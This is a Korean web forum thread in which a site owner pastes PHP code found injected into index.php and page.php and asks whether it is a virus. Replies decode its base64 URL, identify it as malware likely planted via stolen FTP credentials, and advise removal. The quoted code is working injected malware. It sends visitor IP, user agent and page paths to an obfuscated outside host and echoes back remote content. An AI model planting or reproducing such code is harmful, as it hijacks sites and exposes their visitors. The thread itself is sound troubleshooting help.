혹시 바이러스 인가요? :) 정보
혹시 바이러스 인가요? :)
본문
홈페이지 딜레이가 심해서 살펴봤더니,
index.php page.php 파일에만 아래와 같은 코드가 심어져 있어요~
혹시 바이러스 인가요? :)
<?php
if (!isset($sRetry))
{
global $sRetry;
$sRetry = 1;
// This code use for global bot statistic
$sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); // Looks for google serch bot
$stCurlHandle = NULL;
$stCurlLink = "";
if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
{
if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create bot analitics
$stCurlLink = base64_decode( 'aHR0cDovL21icm93c2Vyc3RhdHMuY29tL3N0YXRIL3N0YXQucGhw').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
@$stCurlHandle = curl_init( $stCurlLink );
}
}
if ( $stCurlHandle !== NULL )
{
curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($stCurlHandle, CURLOPT_TIMEOUT, 8);
$sResult = @curl_exec($stCurlHandle);
if ($sResult[0]=="O")
{$sResult[0]=" ";
echo $sResult; // Statistic code end
}
curl_close($stCurlHandle);
}
}
?>
index.php page.php 파일에만 아래와 같은 코드가 심어져 있어요~
혹시 바이러스 인가요? :)
<?php
if (!isset($sRetry))
{
global $sRetry;
$sRetry = 1;
// This code use for global bot statistic
$sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); // Looks for google serch bot
$stCurlHandle = NULL;
$stCurlLink = "";
if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
{
if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create bot analitics
$stCurlLink = base64_decode( 'aHR0cDovL21icm93c2Vyc3RhdHMuY29tL3N0YXRIL3N0YXQucGhw').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
@$stCurlHandle = curl_init( $stCurlLink );
}
}
if ( $stCurlHandle !== NULL )
{
curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($stCurlHandle, CURLOPT_TIMEOUT, 8);
$sResult = @curl_exec($stCurlHandle);
if ($sResult[0]=="O")
{$sResult[0]=" ";
echo $sResult; // Statistic code end
}
curl_close($stCurlHandle);
}
}
?>
댓글 전체
aHR0cDovL21icm93c2Vyc3RhdHMuY29tL3N0YXRIL3N0YXQucGhw
-> 디코딩 결과 ->
http://mbrowserstats.com/statH/stat.php
바이러스인지는 모르겟지만 의도가 아니시라면 지우시는게 좋겠군요;;
-> 디코딩 결과 ->
http://mbrowserstats.com/statH/stat.php
바이러스인지는 모르겟지만 의도가 아니시라면 지우시는게 좋겠군요;;
악성코드에 감염이 된듯하네요.
저도 예전에 있었던 현상 같은데 ftp프로그램이나 에디트플러스에 저장된 계정 정보가 털려서 삭제를 해도 시간이 지나면 또 심어져 있더군요.
다른 백신들은 검사해도 나오질 안던데 어베스트로 바이어스 검사를 해서 겨우 잡았던 기억이..
덕분에 관리하던 사이트들 전부 비번를 바꾸고 난리가 났던적이 있었습니다.
저도 예전에 있었던 현상 같은데 ftp프로그램이나 에디트플러스에 저장된 계정 정보가 털려서 삭제를 해도 시간이 지나면 또 심어져 있더군요.
다른 백신들은 검사해도 나오질 안던데 어베스트로 바이어스 검사를 해서 겨우 잡았던 기억이..
덕분에 관리하던 사이트들 전부 비번를 바꾸고 난리가 났던적이 있었습니다.
바이러스 아니고요 벗이 심긴것 같아요..
지명도 올리는 벗인것 같은데 지우세요.
서버가 당한것 같네요
지명도 올리는 벗인것 같은데 지우세요.
서버가 당한것 같네요
답변 감사드립니다. :)
위 코드를 지우고나니, 딜레이현상이 없어졌어요. ㅎ
위 코드를 지우고나니, 딜레이현상이 없어졌어요. ㅎ
